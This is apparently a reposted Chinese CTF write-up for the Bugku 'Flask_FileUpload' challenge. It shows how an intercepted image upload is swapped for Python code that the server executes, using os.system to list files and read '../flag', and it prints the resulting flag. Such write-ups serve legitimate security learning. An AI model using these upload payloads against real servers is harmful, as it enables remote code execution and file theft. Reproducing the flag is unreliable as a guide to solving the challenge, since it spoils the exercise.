0


bugku CTF练习:Flask_FileUpload思路

https://ctf.bugku.com/challenges/detail/id/204.html

打开页面是这个样子。右键查看源代码。

它提示我说会用Python去执行。太棒了。

选择一张普通图片。点击上传。把流量转到burpsuite上。

把burpsuite上抓到的包发送到重发模块

把图片的内容删除。改成

import os
print(os.system('ls -al'))

发现执行了Python,想了一下。应该是Python执行系统命令。

一步一步。发现上一级目录上有一个flag的文件。

执行下面的代码:

import os
print(os.system('cat ../flag'))

就得到了flag

flag{5f40e0bdb1089bf9dcb06a384c2b2008}

标签: flask python 后端

本文转载自: https://blog.csdn.net/xijieyuan2qi/article/details/122080108
版权归原作者 baby-shark 所有, 如有侵权,请联系我们删除。

“bugku CTF练习:Flask_FileUpload思路”的评论:

还没有评论